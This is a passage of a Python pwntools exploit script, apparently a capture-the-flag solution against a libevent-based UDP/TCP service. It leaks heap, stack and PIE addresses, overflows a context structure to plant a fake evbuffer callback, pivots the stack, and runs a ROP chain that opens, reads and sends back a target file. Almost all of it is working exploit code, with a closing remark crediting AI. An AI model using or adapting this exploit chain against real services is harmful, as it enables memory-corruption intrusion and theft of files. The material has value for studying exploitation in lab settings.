    leaks["global_event_base"] = leaked_heap - GLOBAL_EVENT_BASE_DELTA

    udp.send(blob)
    reply = udp.recvn(0x50)
    leaked_stack = u64(reply[0x40:0x48])
    leaked_pie = u64(reply[0x48:0x50])

    leaks["udp_reply"] = reply
    leaks["leaked_stack"] = leaked_stack
    leaks["leaked_pie_ret"] = leaked_pie
    leaks["pie_base"] = leaked_pie - PIE_LEAK_RET_OFF
    leaks["udp_peer"] = udp.sock.getsockname()

    return leaks


def pop_chain(rop, libc_base, reg, value):
    choices = [
        g
        for g in rop.gadgets.values()
        if g.insns
        and g.insns[-1] == "ret"
        and g.insns[0] == f"pop {reg}"
        and all(insn.startswith("pop ") for insn in g.insns[:-1])
    ]
    if not choices:
        log.failure("missing pop %s gadget", reg)
        raise SystemExit(1)

    gadget = sorted(choices, key=lambda g: len(g.insns))[0]
    extra_pops = len(gadget.insns) - 2
    return p64(libc_base + gadget.address) + p64(value) + p64(0) * extra_pops

def build_payload(leaks):
    pie_base = leaks["pie_base"]
    libc_base = leaks["libc_base"]

    fake_bev_addr = pie_base + BSS_FAKE_BEV_OFF
    path_addr = pie_base + BSS_PATH_OFF
    read_buf_addr = pie_base + BSS_READ_BUF_OFF
    sockaddr_addr = pie_base + BSS_SOCKADDR_OFF
    rop_addr = pie_base + BSS_ROP_OFF

    rop = ROP(libc)

    pop_rdi_g = sorted(
        [
            g
            for g in rop.gadgets.values()
            if g.insns
            and g.insns[-1] == "ret"
            and g.insns[0] == "pop rdi"
            and all(insn.startswith("pop ") for insn in g.insns[:-1])
        ],
        key=lambda g: len(g.insns),
    )[0]
    pop_rsi_g = sorted(
        [
            g
            for g in rop.gadgets.values()
            if g.insns
            and g.insns[-1] == "ret"
            and g.insns[0] == "pop rsi"
            and all(insn.startswith("pop ") for insn in g.insns[:-1])
        ],
        key=lambda g: len(g.insns),
    )[0]
    pop_rax_g = sorted(
        [
            g
            for g in rop.gadgets.values()
            if g.insns
            and g.insns[-1] == "ret"
            and g.insns[0] == "pop rax"
            and all(insn.startswith("pop ") for insn in g.insns[:-1])
        ],
        key=lambda g: len(g.insns),
    )[0]
    pop_rdx_g = sorted(
        [
            g
            for g in rop.gadgets.values()
            if g.insns
            and g.insns[-1] == "ret"
            and g.insns[0] == "pop rdx"
            and all(insn.startswith("pop ") for insn in g.insns[:-1])
        ],
        key=lambda g: len(g.insns),
    )[0]

    open_addr = libc_base + libc.sym["open"]
    read_addr = libc_base + libc.sym["read"]
    mov_rsp_rdx = libc_base + next(libc.search(b"\x48\x89\xd4\xc3"))
    call_sendto = pie_base + CALL_SENDTO_OFF
    output_addr = pie_base+0x41e0
    pivot_stack = output_addr + 0xB0
    rop_addr = pivot_stack


    # 0x41f0/0x4200 overlap this fake evbuffer, so place ROP data later.
    path_addr = pie_base + 0x43C0
    sockaddr_addr = pie_base + 0x43D0
    read_buf = pie_base + 0x43E0

    rop = ROP(libc)
    open_addr = libc_base + libc.sym["open"]
    read_addr = libc_base + libc.sym["read"]
    write_addr = libc_base + libc.sym["write"]
    mov_rsp_rdx = libc_base + next(libc.search(b"\x48\x89\xd4\xc3"))
    call_sendto = pie_base + CALL_SENDTO_OFF

    rop_chain = b""
    rop_chain += pop_chain(rop, libc_base, "rdi", path_addr)
    rop_chain += pop_chain(rop, libc_base, "rsi", 0)
    rop_chain += p64(open_addr)

    rop_chain += pop_chain(rop, libc_base, "rdi", READ_FD)
    rop_chain += pop_chain(rop, libc_base, "rsi", read_buf)
    rop_chain += pop_chain(rop, libc_base, "rdx", 0x50)
    rop_chain += p64(read_addr)

    # write(TCP_FD, read_buf, 0x50)
    rop_chain += pop_chain(rop, libc_base, "rdi", TCP_FD)
    rop_chain += pop_chain(rop, libc_base, "rsi", read_buf)
    rop_chain += pop_chain(rop, libc_base, "rdx", 0x50)
    rop_chain += p64(write_addr)

    payload = b""
    payload += request_blob() # ip 4byte
    payload = payload.ljust(OVERFLOW_TO_TCP_USE_BEV, b"\x00") # 84byte
    payload += p64(1) # tcp_io_ctx_use_bev = 1
    payload += p64(fake_bev_addr)  # tcp_io_ctx_bev = fake_bev_addr  0x40c0+base
    payload += p64(0)   # tcp fd = 0
    payload += p64(leaks["global_event_base"]) # global_event_base = global_event_base
    payload = payload.ljust(BSS_FAKE_BEV_OFF - UDP_IO_CTX_OFF, b"\x00") # fill to 0x40c0
    # fake bev:
    output_addr = pie_base+0x41e0
    fake_cb = output_addr + 0x80
    pivot_stack = output_addr + 0xB0
    payload += cyclic(280)   # 0x40c0 payload
    payload += p64(output_addr) # output_addr
    #---output construction:0x41e0 payload : evbuffer
    # 0x41e0: fake evbuffer.  This is enough for
    # evbuffer_add_reference() -> evbuffer_invoke_callbacks_() -> sub_EF40()
    # to call fake_cb->cb_func(output, &info, fake_cb->cbarg).
    payload += p64(0)            # +0x00 first
    payload += p64(0)            # +0x08 last
    payload += p64(output_addr)  # +0x10 last_with_datap = &first
    payload += p64(0)            # +0x18 total_len
    payload += p64(0)            # +0x20 n_add_for_cb
    payload += p64(0)            # +0x28 n_del_for_cb
    payload += p64(0)            # +0x30 lock
    payload += p64(0)            # +0x38 flags: no freeze, no deferred callback
    payload = payload.ljust((output_addr + 0x78) - (pie_base + UDP_IO_CTX_OFF), b"\x00")
    payload += p64(fake_cb)      # +0x78 callbacks.lh_first
    payload += p64(0)            # +0x80 cb_entry.next
    payload += p64(0)            # +0x88 cb_entry.prev
    payload += p64(mov_rsp_rdx)  # +0x90 cb_entry.cb_func
    payload += p64(rop_addr)     # +0x98 cb_entry.cbarg -> rdx
    payload += p64(1)            # +0xa0 EVBUFFER_CB_ENABLED
    payload = payload.ljust(rop_addr - (pie_base + UDP_IO_CTX_OFF), b"\x00")
    payload += rop_chain
    payload = payload.ljust(path_addr - (pie_base + UDP_IO_CTX_OFF), b"\x00")
    payload += FILE_PATH
    payload = payload.ljust(sockaddr_addr - (pie_base + UDP_IO_CTX_OFF), b"\x00")
    payload += p16(socket.AF_INET)
    payload += p16(leaks["udp_peer"][1], endian="big")
    payload += socket.inet_aton(leaks["udp_peer"][0])
    payload += b"\x00" * 8
    return payload


def main():
    tcp, udp = open_channels()
    try:
        leaks = leak_all(tcp, udp)
        for name, value in leaks.items():
            if isinstance(value, bytes):
                log.info("%s (%#x bytes)", name, len(value))
                print(hexdump(value))
            elif isinstance(value, tuple):
                log.success("%s = %s:%d", name, *value)
            else:
                log.success("%s = %#x", name, value)
        
        payload = build_payload(leaks)
        log.info("payload_len = %#x", len(payload))
        #print(hexdump(payload))
        udp.send(payload)
        tcp.send(b"0.0.0.0\x00")
        tcp.interactive()
    finally:
        if not args.INTERACTIVE:
            tcp.close()
            udp.close()
        


if __name__ == "__main__":
    main()

全靠ai